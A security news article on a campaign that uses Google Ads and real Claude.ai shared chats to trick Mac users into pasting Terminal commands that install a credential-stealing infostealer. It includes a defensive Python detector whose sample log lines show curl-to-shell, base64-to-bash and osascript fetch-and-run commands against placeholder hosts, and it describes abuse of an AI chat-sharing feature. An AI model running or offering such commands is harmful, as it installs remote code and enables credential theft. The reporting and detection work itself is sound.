
Google ads and Claude.ai chats used to spread Mac malware

Summary

– Attackers are using Google Ads and legitimate Claude.ai shared chats in a malvertising campaign targeting users searching for “Claude mac download.”
– The ads direct users to real Claude.ai shared chats that pose as official installation guides, instructing victims to paste Terminal commands that download malware.
– The malware uses polymorphic delivery, serving uniquely obfuscated payloads per request, and checks for Russian or CIS-region keyboard layouts to avoid infecting those users.
– The malware collects victim data (IP, hostname, OS version, keyboard locale) and exfiltrates browser credentials, cookies, and macOS Keychain contents.
– Unlike typical malvertising, the ads point to the legitimate claude.ai domain, exploiting Claude’s shared chat feature to host malicious instructions.

Attackers are now weaponizing Google Ads and Claude.ai shared chats in a sophisticated malvertising campaign that targets users searching for a Mac download of Claude. The scheme lures victims with a sponsored search result that genuinely points at the claude.ai domain but lands on a shared chat serving step-by-step instructions that install malware on their machine.

Security researcher Berk Albayrak of Trendyol Group first flagged the activity on LinkedIn. He uncovered a Claude.ai shared chat disguised as an official “Claude Code on Mac” installation guide, attributed to “Apple Support.” The chat directs users to open Terminal and paste a command that silently downloads and executes malware. BleepingComputer later confirmed a second shared chat using a different domain and payload but following the same social engineering blueprint. Both chats remained publicly accessible at the time of analysis.

The malicious instructions rely on Base64-encoded shell scripts hosted on domains such as customroofingcontractors[.]com and bernasibutuwqu2[.]com. The second variant serves a compressed ‘loader.sh’ that runs entirely in memory, leaving minimal forensic traces on disk. BleepingComputer observed that the server delivered a uniquely obfuscated version of the payload on each request, a technique known as polymorphic delivery, which evades signature-based detection.

In the variant BleepingComputer examined, the script first checks whether the victim’s machine uses Russian or CIS-region keyboard layouts. If so, it exits silently and sends a “cis_blocked” status ping to the attacker. Only machines that pass this geographic check proceed to the next stage. The script then collects the victim’s external IP address, hostname, OS version, and keyboard locale before pulling a second-stage payload and executing it through osascript, the command-line runner for macOS’s built-in AppleScript/OSA scripting. This grants remote code execution without dropping a traditional binary.
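As an added example, not code from the article or from BleepingComputer’s analysis, the following Python detector flags the three behaviours described above when run over process-execution telemetry: a base64 blob decoded straight into a shell, a loader executed from a curl download stream, and osascript launching a shell command that fetches remote content. The telemetry format, rule names, sample lines and URLs are all assumptions constructed for the example.

```python
import re
from typing import Dict, List

# Constructed sample process-execution telemetry in a hypothetical
# "<timestamp> pid=<n> proc=<name> cmd=<command line>" format. The URL and the
# base64 text (it decodes to "PLACEHOLDER") are placeholders, not indicators
# from the campaign; the lines mimic the chain the article describes: a pasted
# command that base64-decodes a script straight into a shell, a loader fetched
# with curl and run from the download stream, and a second stage launched
# through osascript. The last two lines are benign and must not be flagged.
SAMPLE_LOG = """\
2025-01-01T10:00:01 pid=501 proc=bash cmd=echo UExBQ0VIT0xERVI= | base64 -D | bash
2025-01-01T10:00:02 pid=502 proc=sh cmd=curl -fsSL https://example.invalid/loader.sh | sh
2025-01-01T10:00:03 pid=503 proc=osascript cmd=osascript -e 'do shell script "curl -fsSL https://example.invalid/stage2 | sh"'
2025-01-01T10:05:00 pid=600 proc=bash cmd=ls -la /Applications
2025-01-01T10:06:00 pid=601 proc=base64 cmd=base64 -D -i notes.b64 -o notes.txt
"""

SHELL = r"(?:ba|z)?sh\b"  # interpreters a pasted one-liner normally ends in
RULES: Dict[str, re.Pattern] = {
    # decoded script piped into a shell: nothing readable is written to disk
    "base64_piped_to_shell": re.compile(rf"\bbase64\s+(?:-d|-D|--decode)\b[^|]*\|\s*{SHELL}"),
    # remote content executed directly from the download stream
    "curl_piped_to_shell": re.compile(rf"\bcurl\b[^|]*\|\s*{SHELL}"),
    # osascript used as a launcher for a shell command that fetches content
    "osascript_remote_shell": re.compile(r"\bosascript\b.*do shell script.*\b(?:curl|wget)\b"),
}
LINE_RE = re.compile(r"^(?P<ts>\S+) pid=(?P<pid>\d+) proc=(?P<proc>\S+) cmd=(?P<cmd>.*)$")


def scan_log(text: str) -> List[Dict[str, str]]:
    """Return one finding per (line, rule) match; lines in another format are skipped."""
    findings = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        for rule, pattern in RULES.items():
            if pattern.search(m["cmd"]):
                findings.append({"ts": m["ts"], "pid": m["pid"], "rule": rule, "cmd": m["cmd"]})
    return findings


def rules_by_pid(text: str) -> Dict[str, List[str]]:
    """Collapse findings to pid -> sorted rule names, the shape an alert would carry."""
    out: Dict[str, List[str]] = {}
    for f in scan_log(text):
        out.setdefault(f["pid"], []).append(f["rule"])
    return {pid: sorted(rules) for pid, rules in out.items()}
```

Calling `rules_by_pid(SAMPLE_LOG)` flags pids 501, 502 and 503 (the osascript line trips both the osascript and curl rules) while the plain `ls` and the file-to-file base64 decode produce nothing, which is the point of requiring the pipe into a shell rather than alerting on every base64 use.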

Albayrak’s variant skips the profiling step entirely. It goes straight to harvesting browser credentials, cookies, and macOS Keychain contents, then exfiltrates them as a variant of the MacSync infostealer. The domain briskinternet[.]com used in that variant appeared offline at the time of writing.

What makes this campaign particularly dangerous is that the destination URL in the ad is genuine. Both Google ads point to Anthropic’s real claude.ai domain because the attackers host their malicious instructions inside Claude’s own shared chat feature. There is no fake domain to spot, a twist on traditional malvertising that relies on lookalike phishing sites.

This is not the first time AI platform shared chats have been abused. In December, BleepingComputer reported a similar campaign targeting ChatGPT and Grok users. Earlier this year, threat actors ran an identical campaign aimed at macOS developers searching for Homebrew. Targeting Claude, however, casts a much wider net, reaching non-technical users who may be curious about AI and less likely to scrutinize a terminal command before running it.

To stay safe, users should navigate directly to claude.ai for downloading the native Claude app rather than clicking sponsored search results. The legitimate Claude Code CLI is available through Anthropic’s official documentation and does not require pasting commands from a chat interface. As a general rule, treat any instructions asking you to paste terminal commands with caution, regardless of where they appear to come from.

BleepingComputer reached out to Anthropic and Google for comment prior to publishing.

(Source: BleepingComputer)
